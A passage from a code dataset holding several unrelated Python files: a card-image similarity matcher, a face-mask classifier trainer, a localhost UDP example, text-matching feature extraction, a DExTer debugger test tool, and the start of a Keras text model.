rankList.append((trueFilePath.split('/')[-2],euclidean_distance.item(),trueFilePath))\n #featureMapList.append(output1)\n\n rankList.sort(key = lambda x: x[1])\n return rankList, featureMapList\n\n\n\n\n\n#####\n# We check for model / dictionary mismatch\n#####\nfeatureMapDict = pickle.load(open(dictPath, 'rb'))\nprint(dictPath)\nprint(loadPath)\n\n\n# We do some unit tests to see if model matches dictionary activation maps\ntmpPath0 = targetDirName+'Union-Attack-0-60399954/603999540.jpg'\n\nassert os.path.exists(targetDirName)\nassert os.path.exists(tmpPath0)\n\n\n\nimg0 = imgArtCropper(cv2.resize(cv2.imread(tmpPath0,0), dim, interpolation = cv2.INTER_AREA))/255.0\nimg0 = cv2.resize(img0, dim, interpolation = cv2.INTER_AREA)\nimg0 = [img0] * 3\nimg0 = expand_img_dim(img0,1)\nimg0 = torch.from_numpy(img0).type('torch.FloatTensor')\n\nif useGPU:\n output1,output2,output3 = net(Variable(img0).cuda(),Variable(img0).cuda(),Variable(img0).cuda())\nelse:\n output1,output2,output3 = net(Variable(img0),Variable(img0),Variable(img0))\n\ncardNameTemp = tmpPath0.split('/')[-2]\nname,output2 = featureMapDict[cardNameTemp]\nprint(cardNameTemp)\n\nif useGPU:\n euclidean_distance = F.pairwise_distance(output1, output2)\nelse:\n euclidean_distance = F.pairwise_distance(output1, output2.detach().cpu())\n\nprint(euclidean_distance.item())\n\n\nassert euclidean_distance.item() < 0.001\nprint('No model / dictionary mismatch')\n\n\n\n\n\n\n\n\n\n\n\n\ndef calculateSIFTscore(similarScore, numOfPts):\n if extremeSIFT:\n return similarScore-(numOfPts**3)/10000000\n return similarScore-(numOfPts**2)/100000\n\ndef calculateHOGpoints(orb,img1,img2):\n kpts1, descs1 = orb.detectAndCompute(img1,None)\n kpts2, descs2 = orb.detectAndCompute(img2,None)\n\n if descs2 is None:\n return 0\n\n #print(len(descs2))\n\n ## match descriptors and sort them in the order of their distance\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = bf.match(descs1, descs2)\n dmatches = sorted(matches, key = lambda x:x.distance)\n\n numOfMatches = len(matches)\n\n return numOfMatches\n\norb = cv2.ORB_create()\n\n\n\n\n# Faster way to predict by using dictionary\n# We calculate the output of all images in the dataset ahead of time and store them in a dictionary\n# We iterate through that and calulate distance score\n# This means checking each input's simularity rank takes under 2 seconds to run\n\n# Will consider on using a min heap to make this faster\n\n\n\nrankList = []\n\nbegin = time()\n\n\nimg0Display = imgPathToTensor(imagePath0) # For display purposes\nimg0 = imgPathToNormalizedTensor(imagePath0)\n\n\n#siftImg0 = imgArtCropper(cv2.resize(cv2.imread(imagePath0,0), dim, interpolation = cv2.INTER_AREA))/255.0\nsiftImg0 = imgArtCropper(cv2.imread(imagePath0,0))\nsiftImg0 = cv2.resize(siftImg0, dim, interpolation = cv2.INTER_AREA)\n\n\n\n\n\n\n\n\n# Get the activation map of the test image\nif useGPU:\n output1,output2,output3 = net(Variable(img0).cuda(),Variable(img0).cuda(),Variable(img0).cuda())\nelse:\n output1,output2,output3 = net(Variable(img0),Variable(img0),Variable(img0))\n#output1 = net.forward_once(img0)\n\nprint('Single image prediction phase: ',time()-begin,'s')\nbegin = time()\n\n# Iterating through all activation maps\nfor key,value in featureMapDict.items():\n \n absPath,output2 = value\n if useGPU:\n euclidean_distance = F.pairwise_distance(output1, output2)\n else:\n euclidean_distance = F.pairwise_distance(output1, output2.detach().cpu())\n\n 
#rankList.append((trueFilePath.split('/')[-2],euclidean_distance.item(),trueFilePath))\n rankList.append((key,euclidean_distance.item(),absPath,None))\n\n\n\n\nrankList.sort(key = lambda x: x[1])\n\n\n# Now we just get results\nprint('\\n\\n\\n\\n\\n')\ni = 0\n#for name,score,absPath in rankList:\n\n# Now we calculate for HOG points\n\n\nrankListFinal = []\nfor name,score,absPath,_ in rankList[:siftNLim]:\n #img1 = imgArtCropper(cv2.resize(cv2.imread(absPath,0), dim, interpolation = cv2.INTER_AREA))/255.0\n img1 = imgArtCropper(cv2.imread(absPath,0))\n img1 = cv2.resize(img1, dim, interpolation = cv2.INTER_AREA)\n\n numPoints = calculateHOGpoints(orb,siftImg0,img1)\n finalScore = calculateSIFTscore(score, numPoints)\n rankListFinal.append((name,finalScore,absPath,numPoints,score))\n\n \nif HOGRankingEnable:\n rankListFinal.sort(key = lambda x: x[1])\nelse:\n rankListFinal.sort(key = lambda x: x[4])\n\n \nprint('Dictionary manage',time()-begin,'s')\n\n\nrankStr = None\nguessedCorrectlyRankOne = False\n\nrankIter = 0\nincorrectList = []\npred = []\n\nfor name,score,absPath,numHOGPoints,originalScore in rankListFinal:\n \n rankStr = ': rankOriginal:'\n if HOGRankingEnable:\n rankStr = ': rank:'\n\n\n #print(name,': ', score)\n incorrectList.append(name)\n \n print(cardName, ' ', absPath.split('/')[2])\n # We matched with the correct monster\n if absPath.split('/')[2] == cardName:\n if(rankIter == 0):\n print('\\n\\nCorrect\\n\\n')\n pred = np.append(pred,1)\n guessedCorrectlyRankOne = True\n\n img1 = imgPathToTensor(absPath)\n\n if visualizeResult:\n concatenated = torch.cat((img0Display,img1),0)\n\n print('______________________________________________________________________________________________________')\n print('\\n\\n\\n')\n \n rankStr = ' ' + name + rankStr + str(i) + ' (out of '+str(len(rankList))+') score:'+str(score) + ' numORBpts:' + str(numHOGPoints)+' originalScore: ' + str(originalScore)\n print(' ',imagePath0)\n print(rankStr)\n print('\\n\\n')\n print('______________________________________________________________________________________________________')\n elif i < viewNCards:\n img1 = imgPathToTensor(absPath)\n concatenated = torch.cat((img0Display,img1),0)\n\n if visualizeResult:\n #if visualizeResult or not guessedCorrectlyRankOne:\n \n print(name,': ',rankStr,i,' score:',score, ' numORBpts:', str(numHOGPoints),' originalScore: ', str(originalScore))\n i+=1\n rankIter+=1\n\nif not guessedCorrectlyRankOne:\n print('\\n\\nIncorrect\\n\\n')\n pred = np.append(pred,0)\n\n# Show all of the predictions\nfor guessedNames in incorrectList:\n print(guessedNames)\n\nif visualizeResult:\n print('\\n\\n\\n')\n print(rankStr)\n print(' ',imagePath0)\n print('\\n\\n\\n')\n correctCount = np.where(pred==1)[0].shape[0] \n wrongCount = np.where(pred==0)[0].shape[0] \n print('Correct: ', correctCount, ' Incorrect count: ',wrongCount)\n\n print('---------------------------------------------------')\n\n# Then we show the results\n#print(predictList)\n\naccuracy = np.where(pred==1)[0].shape[0]/pred.shape[0]\nprint('Accuracy: ', accuracy)\n\n","sub_path":"predictAll.py","file_name":"predictAll.py","file_ext":"py","file_size_in_byte":24621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"250345706","text":"import tensorflow as tf\r\nimport cv2\r\nimport random\r\nimport image_utils\r\nimport numpy as np\r\nfrom os import path, mkdir, listdir\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import 
Sequential\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.layers import Activation, Dropout, Flatten, Dense\r\n\r\n#loading images of mask/unmasked dataset with validation images\r\nclass MaskTrainNN:\r\n def load_training_set2(self):\r\n train_datagen = ImageDataGenerator(\r\n rotation_range=40,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n\r\n test_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\n #training set\r\n train_generator = train_datagen.flow_from_directory(\r\n 'temp_data/train', \r\n target_size=(200, 200), \r\n batch_size=4,\r\n class_mode='binary') \r\n\r\n #validation set\r\n validation_generator = test_datagen.flow_from_directory(\r\n 'temp_data/validation',\r\n target_size=(200, 200),\r\n batch_size=4,\r\n class_mode='binary')\r\n\r\n return train_generator, validation_generator\r\n\r\n\r\n def load_training_set(self):\r\n print(\"Loading Training Set\")\r\n mask_data_dir = \"mask_data\"\r\n masked_folder = \"masked\"\r\n unmasked_folder = \"unmasked\"\r\n\r\n #finding mask dataset directories\r\n mask_dirs = listdir(mask_data_dir + \"/\" + masked_folder)\r\n unmask_dirs = listdir(mask_data_dir + \"/\" + unmasked_folder)\r\n images = []\r\n ids = []\r\n masked_found = 0\r\n unmasked_found = 0\r\n\r\n #iterate the masked data set\r\n for u in mask_dirs:\r\n user_files = listdir(mask_data_dir + \"/\" + masked_folder + \"/\" + u) \r\n for f in user_files: \r\n #print(mask_data_dir + \"/\" + masked_folder + \"/\" + u + \"/\" + f)\r\n if('┼' in f):\r\n continue\r\n image = cv2.imread(mask_data_dir + \"/\" + masked_folder + \"/\" + u + \"/\" + f)\r\n image_color, _ = image_utils.crop_colour(image)\r\n if(not image_color.size == 0):\r\n ids.append([1, 0])\r\n images.append(image_color)\r\n masked_found += 1\r\n print(\"Masked: \" + str(masked_found))\r\n\r\n #iterate the unmasked data set\r\n for u in unmask_dirs: \r\n #print(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u)\r\n user_files = listdir(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u)\r\n for f in user_files:\r\n #print(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u + \"/\" + f)\r\n image = cv2.imread(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u + \"/\" + f)\r\n image_color, _ = image_utils.crop_colour(image)\r\n if(not image_color.size == 0):\r\n ids.append([0, 1])\r\n images.append(image_color)\r\n unmasked_found += 1\r\n print(\"Unmasked: \" + str(unmasked_found))\r\n\r\n print(\"Total Masked: \" + str(masked_found))\r\n print(\"Total Unmasked: \" + str(unmasked_found))\r\n np_im = np.array(images, dtype=np.float32)\r\n np_id = np.array(ids, dtype=np.float32)\r\n return np_im.astype(np.float32), np_id.astype(np.float32)\r\n\r\n #keras used for model\r\n def build_model(self):\r\n model = tf.keras.models.Sequential([\r\n tf.keras.layers.Conv2D(100, (3,3), activation='relu', input_shape=(200, 200, 3)),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n \r\n tf.keras.layers.Conv2D(100, (3,3), activation='relu'),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n \r\n tf.keras.layers.Flatten(),\r\n tf.keras.layers.Dropout(0.5),\r\n tf.keras.layers.Dense(50, activation='relu'),\r\n tf.keras.layers.Dense(1, activation='sigmoid')\r\n ])\r\n model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\r\n return model\r\n\r\n #run training for mask/unmask detection\r\n def run_training2(self):\r\n model = self.build_model()\r\n train_generator, 
validation_generator = self.load_training_set2()\r\n model.fit_generator(\r\n train_generator,\r\n epochs=50,\r\n validation_data=validation_generator)\r\n\r\n # serialize model to JSON\r\n model_json = model.to_json()\r\n with open(\"model.json\", \"w\") as json_file:\r\n json_file.write(model_json)\r\n # serialize weights to HDF5\r\n model.save_weights(\"model.h5\")\r\n print(\"Saved weights to disk\")\r\n #model.save(\"mask_model\")\r\n print(\"Done\")\r\n\r\n def run_training(self):\r\n model = self.build_model()\r\n x_train, y_train = self.load_training_set()\r\n print(\"Start Fitting\")\r\n history = model.fit(x_train, y_train, batch_size=64, epochs=1)\r\n\r\n # serialize model to JSON\r\n model_json = model.to_json()\r\n with open(\"model.json\", \"w\") as json_file:\r\n json_file.write(model_json)\r\n # serialize weights to HDF5\r\n model.save_weights(\"model.h5\")\r\n print(\"Saved model to disk\")\r\n\r\n scores = model.evaluate(x_train, y_train, verbose=0)\r\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\r\n #model.save(\"mask_model\")\r\n print(\"Done\")\r\n \r\n \r\n#----- OLD METHOD OF TRAINING --- NOT USED DUE TO .YML TOO BIG (11gb+ with supplied dataset)-----\r\n#https://github.com/X-zhangyang/Real-World-Masked-Face-Dataset - masked dataset source - NOT USED\r\nclass MaskTrain:\r\n def run_training(self):\r\n mask_data_dir = \"mask_data\"\r\n masked_folder = \"masked\"\r\n unmasked_folder = \"unmasked\"\r\n\r\n #finding mask dataset directories\r\n mask_dirs = listdir(mask_data_dir + \"/\" + masked_folder)\r\n unmask_dirs = listdir(mask_data_dir + \"/\" + unmasked_folder)\r\n images = []\r\n ids = []\r\n\r\n #iterate the masked data set\r\n for u in mask_dirs:\r\n user_files = listdir(mask_data_dir + \"/\" + masked_folder + \"/\" + u)\r\n for f in user_files:\r\n print(mask_data_dir + \"/\" + masked_folder + \"/\" + u + \"/\" + f)\r\n if('┼' in f):\r\n continue\r\n image = cv2.imread(mask_data_dir + \"/\" + masked_folder + \"/\" + u + \"/\" + f)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n ids.append(1)\r\n images.append(image)\r\n\r\n #iterate the unmasked data set\r\n for u in unmask_dirs:\r\n print(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u)\r\n user_files = listdir(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u)\r\n for f in user_files:\r\n print(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u + \"/\" + f)\r\n image = cv2.imread(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u + \"/\" + f)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n ids.append(0)\r\n images.append(image)\r\n\r\n recogniser = cv2.face.LBPHFaceRecognizer_create()\r\n recogniser.train(images, np.array(ids))\r\n recogniser.write(\"mask_train.yml\")\r\n\r\nr = MaskTrainNN()\r\nr.run_training2()\r\n#r = MaskTrain()\r\n#r.run_training()\r\n\r\n\r\n","sub_path":"AttendanceMonitor/mask_train.py","file_name":"mask_train.py","file_ext":"py","file_size_in_byte":7570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"71738762","text":"# encoding:utf-8\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET,socket.SOCK_DGRAM,socket.IPPROTO_UDP)\r\n\r\n# 绑定udp服务端\r\ns.bind( ('127.0.0.1', 3456) )\r\n\r\ndata = s.recvfrom(100 )\r\ns.sendto('数据', ('127.0.0.1' , 6789))\r\n\r\n\r\n","sub_path":"py003/py003_udp_server.py","file_name":"py003_udp_server.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"473101313","text":"# filepath_en_train = \"E:\\\\CIKM2018\\\\cikm_english_train_20180516\\\\cikm_english_train_20180516.txt\"\n# filepath_sp_train = \"E:\\\\CIKM2018\\\\cikm_spanish_train_20180516.txt\"\n# filepath_test = \"E:\\\\CIKM2018\\\\cikm_test_a_20180516.txt\"\n# filepath_unlabel = \"E:\\\\CIKM2018\\\\cikm_unlabel_spanish_train_20180516\\\\cikm_unlabel_spanish_train_20180516.txt\"\n# w2v_pah = \"E:\\\\CIKM2018\\\\w2v.model.bin\"\n# fast_path = \"E:\\\\CIKM2018\\\\fast_text_vectors_wiki.es.vec\\\\wiki.es.vec\"\n# file_stop_word = \"E:\\\\CIKM2018\\\\spanish_stop_word.txt\"\nfilepath_en_train = \"I:\\\\CIKM\\\\cikm_english_train_20180516\\\\cikm_english_train_20180516.txt\"\nfilepath_sp_train = \"I:\\\\CIKM\\\\cikm_spanish_train_20180516.txt\"\nfilepath_test = \"I:\\\\CIKM\\\\cikm_test_a_20180516.txt\"\nfilepath_unlabel = \"I:\\\\CIKM\\\\cikm_unlabel_spanish_train_20180516\\\\cikm_unlabel_spanish_train_20180516.txt\"\nw2v_pah = \"I:\\\\CIKM\\\\w2v.model.bin\"\nfast_path = \"I:\\\\CIKM\\\\fast_text_vectors_wiki.en.vec\\\\wiki.en.vec\"\nfile_stop_word = \"I:\\\\CIKM\\\\spanish_stop_word.txt\"\nfrom text_match.en.data_utils import datahelper\nimport pandas as pd\nimport numpy as np\nfrom gensim.models.tfidfmodel import TfidfModel\nfrom gensim.similarities import MatrixSimilarity\nfrom scipy import spatial\nimport datetime\nfrom scipy.stats import skew, kurtosis\nfrom gensim.corpora.dictionary import Dictionary\n\nx_train1, x_train2, _ = datahelper.load_data(filepath_en_train, filepath_sp_train)\ntrain = pd.DataFrame()\n\ntrain['question1'] = x_train1\ntrain['question2'] = x_train2\n\n# clean\ntfidf_txt = train['question1'].tolist() + train['question2'].tolist()\ntrain_qs = pd.Series(tfidf_txt).astype(str)\ndictionary = Dictionary(x.split(\" \") for x in tfidf_txt)\n\n\nclass MyCorpus(object):\n def __iter__(self):\n for x in tfidf_txt:\n yield dictionary.doc2bow(x.split(\" \"))\n\n\ncorpus = MyCorpus()\ntfidf = TfidfModel(corpus)\n\n\ndef getdiffwords(q1, q2):\n word1 = q1.split()\n word2 = q2.split()\n qdf1 = [w for w in word1 if w not in word2]\n tmp = \" \".join(qdf1)\n return tmp\n\n\ndef to_tfidf(text):\n res = tfidf[dictionary.doc2bow(text.split(\" \"))]\n return res\n\n\ndef tfidf_w(token):\n weights = dictionary.token2id\n if token in weights:\n res = tfidf.idfs[weights[token]]\n else:\n res = 1.0\n return res\n\n\ndef eucldist_vectorized(word_1, word_2):\n try:\n w2v1 = model[word_1]\n w2v2 = model[word_2]\n sim = np.sqrt(np.sum((np.array(w2v1) - np.array(w2v2)) ** 2))\n return float(sim)\n except:\n return float(0)\n\n\n# 输入两个wordlist\n# 默认句子中每个词权重相同,实际可以更改\ndef getDiff(wordlist_1, wordlist_2):\n wordlist_1 = wordlist_1.split()\n wordlist_2 = wordlist_2.split()\n num = len(wordlist_1) + 0.001\n sim = 0.0\n for word_1 in wordlist_1:\n dis = 0.0\n for word_2 in wordlist_2:\n if (dis == 0.0):\n dis = eucldist_vectorized(word_1, word_2)\n else:\n dis = min(dis, eucldist_vectorized(word_1, word_2))\n sim += dis\n return (sim / num)\n\n\ndef getDiff_weight(wordlist_1, wordlist_2):\n wordlist_1 = wordlist_1.split()\n wordlist_2 = wordlist_2.split()\n tot_weights = 0.0\n for word_1 in wordlist_1:\n tot_weights += tfidf_w(word_1)\n sim = 0.0\n for word_1 in wordlist_1:\n dis = 0.0\n for word_2 in wordlist_2:\n if (dis == 0.0):\n dis = eucldist_vectorized(word_1, word_2)\n else:\n dis = min(dis, eucldist_vectorized(word_1, word_2))\n sim += tfidf_w(word_1) * dis\n return sim\n\n\ndef getDiff_averge(wordlist_1, wordlist_2):\n return getDiff_weight(wordlist_1, wordlist_2) + 
getDiff_weight(wordlist_2, wordlist_1)\n\n\ndef cos_sim(text1, text2):\n tfidf1 = to_tfidf(text1)\n tfidf2 = to_tfidf(text2)\n index = MatrixSimilarity([tfidf1], num_features=len(dictionary))\n sim = index[tfidf2]\n return float(sim[0])\n\n\ndef get_vector(text):\n # 建立一个全是0的array\n res = np.zeros([300])\n count = 0\n for word in text.split(\" \"):\n if word in vocab:\n res += tfidf_w(word) * model[word]\n count += tfidf_w(word)\n if count != 0:\n return res / count\n return np.zeros([300])\n\n\ndef get_weight_vector(text):\n # 建立一个全是0的array\n res = np.zeros([300])\n count = 0\n for word in text.split(\" \"):\n if word in vocab:\n res += model[word]\n count += 1\n if count != 0:\n return res / count\n return np.zeros([300])\n\n\ndef w2v_cos_sim(text1, text2):\n try:\n w2v1 = get_weight_vector(text1)\n w2v2 = get_weight_vector(text2)\n sim = 1 - spatial.distance.cosine(w2v1, w2v2)\n return float(sim)\n except:\n return float(0)\n\n\ndef get_features(df_features):\n print('use w2v to document presentation')\n now = datetime.datetime.now()\n now.strftime('%Y-%m-%d %H:%M:%S')\n print('get_w2v')\n now = datetime.datetime.now()\n now.strftime('%Y-%m-%d %H:%M:%S')\n df_features['q1_unique'] = df_features.apply(lambda x: getdiffwords(x['question1'], x['question2']), axis=1)\n df_features['q2_unique'] = df_features.apply(lambda x: getdiffwords(x['question2'], x['question1']), axis=1)\n\n df_features['q1_unique_w2v_weight'] = df_features.q1_unique.map(lambda x: get_vector(x))\n df_features['q2_unique_w2v_weight'] = df_features.q2_unique.map(lambda x: get_vector(x))\n df_features['q1_unique_w2v'] = df_features.q1_unique.map(lambda x: get_weight_vector(x))\n df_features['q2_unique_w2v'] = df_features.q2_unique.map(lambda x: get_weight_vector(x))\n\n print('z_dist')\n now = datetime.datetime.now()\n now.strftime('%Y-%m-%d %H:%M:%S')\n now = datetime.datetime.now()\n print('z_tfidf_cos_sim')\n now.strftime('%Y-%m-%d %H:%M:%S')\n now = datetime.datetime.now()\n now.strftime('%Y-%m-%d %H:%M:%S')\n\n df_features['z_w2v_unique_dis_e_weight'] = df_features.apply(\n lambda x: spatial.distance.euclidean(x['q1_unique_w2v_weight'], x['q2_unique_w2v_weight']), axis=1)\n df_features['z_w2v_unique_dis_e'] = df_features.apply(\n lambda x: spatial.distance.euclidean(x['q1_unique_w2v'], x['q2_unique_w2v']), axis=1)\n\n df_features['z_w2v_unique_dis_mink_w'] = df_features.apply(\n lambda x: spatial.distance.minkowski(x['q1_unique_w2v_weight'], x['q2_unique_w2v_weight'], 3), axis=1)\n df_features['z_w2v_unique_dis_cityblock_w'] = df_features.apply(\n lambda x: spatial.distance.cityblock(x['q1_unique_w2v_weight'], x['q2_unique_w2v_weight']), axis=1)\n df_features['z_w2v_unique_dis_canberra_w'] = df_features.apply(\n lambda x: spatial.distance.canberra(x['q1_unique_w2v_weight'], x['q2_unique_w2v_weight']), axis=1)\n\n df_features['z_w2v_unique_dis_mink'] = df_features.apply(\n lambda x: spatial.distance.minkowski(x['q1_unique_w2v'], x['q2_unique_w2v'], 3), axis=1)\n df_features['z_w2v_unique_dis_cityblock'] = df_features.apply(\n lambda x: spatial.distance.cityblock(x['q1_unique_w2v'], x['q2_unique_w2v']), axis=1)\n df_features['z_w2v_unique_dis_canberra'] = df_features.apply(\n lambda x: spatial.distance.canberra(x['q1_unique_w2v'], x['q2_unique_w2v']), axis=1)\n\n df_features['z_q1_unique_skew_w'] = df_features.q1_unique_w2v_weight.map(lambda x: skew(x))\n df_features['z_q2_unique_skew_w'] = df_features.q2_unique_w2v_weight.map(lambda x: skew(x))\n df_features['z_q1_unique_kur_w'] = 
df_features.q1_unique_w2v_weight.map(lambda x: kurtosis(x))\n df_features['z_q2_unique_kur_w'] = df_features.q2_unique_w2v_weight.map(lambda x: kurtosis(x))\n\n df_features['z_q1_unique_skew'] = df_features.q1_unique_w2v.map(lambda x: skew(x))\n df_features['z_q2_unique_skew'] = df_features.q2_unique_w2v.map(lambda x: skew(x))\n df_features['z_q1_unique_kur'] = df_features.q1_unique_w2v.map(lambda x: kurtosis(x))\n df_features['z_q2_unique_kur'] = df_features.q2_unique_w2v.map(lambda x: kurtosis(x))\n del df_features['q1_unique_w2v_weight']\n del df_features['q2_unique_w2v_weight']\n del df_features['q1_unique_w2v']\n del df_features['q2_unique_w2v']\n print('all done')\n now.strftime('%Y-%m-%d %H:%M:%S')\n df_features.fillna(0.0)\n return df_features\n\n\nfrom gensim.models import KeyedVectors\n\nif __name__ == '__main__':\n model = KeyedVectors.load_word2vec_format(fast_path)\n vocab = model.vocab\n\n train = get_features(train)\n train.to_csv('train_weight_noweight.csv', index=False)\n","sub_path":"text_match/en/features/testunique/test_unique.py","file_name":"test_unique.py","file_ext":"py","file_size_in_byte":8443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598587364","text":"import sys\n\nn = input()\n\nfor i in sys.stdin:\n\tnum = i[0]\n\tgrades = [int(v) for v in i.split()[1:]]\n\t\n\tavg = sum(grades) / len(grades)\n\tabove = [1 if v > avg else 0 for v in grades]\n\tprint(\"{:.3f}%\".format(sum(above) / len(grades) * 100))","sub_path":"Desktop/Python/aa2.py","file_name":"aa2.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"584958351","text":"# DExTer : Debugging Experience Tester\n# ~~~~~~ ~ ~~ ~ ~~\n#\n# Copyright (c) 2018 by SN Systems Ltd., Sony Interactive Entertainment Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"Test tool.\"\"\"\n\nimport os\nimport csv\n\nfrom dex.builder import run_external_build_script\nfrom dex.debugger.Debuggers import get_debugger_steps\nfrom dex.heuristic import Heuristic\nfrom dex.tools import TestToolBase\nfrom dex.utils.Exceptions import DebuggerException\nfrom dex.utils.Exceptions import BuildScriptException, HeuristicException\nfrom dex.utils.PrettyOutputBase import Stream\n\n\nclass TestCase(object):\n def __init__(self, context, name, heuristic, error):\n self.context = context\n self.name = name\n self.heuristic = heuristic\n self.error = error\n\n @property\n def penalty(self):\n try:\n return self.heuristic.penalty\n except AttributeError:\n return float('nan')\n\n @property\n def max_penalty(self):\n try:\n return self.heuristic.max_penalty\n except AttributeError:\n return float('nan')\n\n @property\n def score(self):\n try:\n return self.heuristic.score\n except AttributeError:\n return float('nan')\n\n def __str__(self):\n if self.error and self.context.options.verbose:\n verbose_error = str(self.error)\n else:\n verbose_error = ''\n\n if self.error:\n script_error = (' : {}'.format(\n self.error.script_error.splitlines()[0].decode()) if getattr(\n self.error, 'script_error', None) else '')\n\n error = ' [{}{}]'.format(\n str(self.error).splitlines()[0], script_error)\n else:\n error = ''\n\n try:\n summary = self.heuristic.summary_string\n except AttributeError:\n summary = 'nan/nan (nan)'\n return '{}: {}{}\\n{}'.format(self.name, summary, error, verbose_error)\n\n\nclass Tool(TestToolBase):\n \"\"\"Run the specified DExTer test(s) with the specified compiler and linker\n options and produce dextIR output as a JSON file as well as printing out\n the debugging experience score calculated by the DExTer heuristic.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Tool, self).__init__(*args, **kwargs)\n self._test_cases = []\n\n @property\n def name(self):\n return 'DExTer test'\n\n def _run_test(self, subdir, test_name):\n options = self.context.options\n test_name = os.path.relpath(subdir, options.tests_directory)\n if os.path.split(test_name)[-1] == '.':\n test_name = os.path.basename(subdir)\n\n compiler_options = [options.cflags for _ in options.source_files]\n linker_options = options.ldflags\n try:\n _, _, builderIR = run_external_build_script(\n self.context,\n script_path=self.build_script,\n source_files=options.source_files,\n compiler_options=compiler_options,\n linker_options=linker_options,\n executable_file=options.executable)\n except BuildScriptException as e:\n test_case = TestCase(self.context, test_name, None, e)\n self.context.o.auto(test_case)\n self._test_cases.append(test_case)\n return\n\n try:\n steps = get_debugger_steps(self.context)\n steps.builder = builderIR\n except DebuggerException as e:\n test_case = TestCase(self.context, test_name, None, e)\n self.context.o.auto(test_case)\n self._test_cases.append(test_case)\n return\n\n test_results_path = os.path.join(options.results_directory, '_'.join(\n os.path.split(test_name)))\n output_text_path = '{}.txt'.format(test_results_path)\n with open(output_text_path, 'w') as fp:\n self.context.o.auto(str(steps), stream=Stream(fp))\n\n output_json_path = '{}.json'.format(test_results_path)\n with 
open(output_json_path, 'w') as fp:\n fp.write(steps.as_json)\n\n try:\n heuristic = Heuristic(self.context, steps)\n except HeuristicException as e:\n test_case = TestCase(self.context, test_name, None, e)\n self.context.o.auto(test_case)\n self._test_cases.append(test_case)\n return\n\n with open(output_text_path, 'a') as fp:\n self.context.o.auto(heuristic.verbose_output, stream=Stream(fp))\n\n test_case = TestCase(self.context, test_name, heuristic, None)\n self.context.o.auto(test_case)\n self._test_cases.append(test_case)\n\n if options.verbose:\n self.context.o.auto('\\n{}\\n'.format(steps))\n self.context.o.auto(heuristic.verbose_output)\n\n def _handle_results(self):\n options = self.context.options\n\n if not options.verbose:\n self.context.o.auto('\\n')\n\n summary_path = os.path.join(options.results_directory, 'summary.csv')\n with open(summary_path, mode='w', newline='') as fp:\n writer = csv.writer(fp, delimiter=',')\n writer.writerow(['Test Case', 'Score', 'Error'])\n\n for test_case in self._test_cases:\n writer.writerow([\n test_case.name, '{:.4f}'.format(test_case.score),\n test_case.error\n ])\n\n return 0\n","sub_path":"dex/tools/test/Tool.py","file_name":"Tool.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"58837458","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 1 08:59:14 2019\n\n@author: xabuka\nusing CNN + RNN\n\"\"\"\n\nimport loading\n\nmax_features = 10000 # number of words to consider as features\nmax_len = 500\ntraining_samples = 700 # We will be training on 200 samples\nvalidation_samples = 200 # We will be validating on 10000 samples\n\nx_train, y_train, x_val,y_val = loading.load_train(max_len,training_samples,validation_samples,max_features )\nx_test, y_test = loading.load_test(max_len,max_features)\nprint('input_train shape:', x_train.shape)\nprint('input_test shape:', x_test.shape)\n\n\nfrom keras.models import Sequential\nfrom keras import layers\nfrom keras.optimizers import RMSprop\n#from keras.layers import Embedding, Conv1D,MaxPooling1D, GlobalMaxPooling1D, Dense\nmodel = Sequential()\nmodel.add(layers.Embedding(max_features, 128, 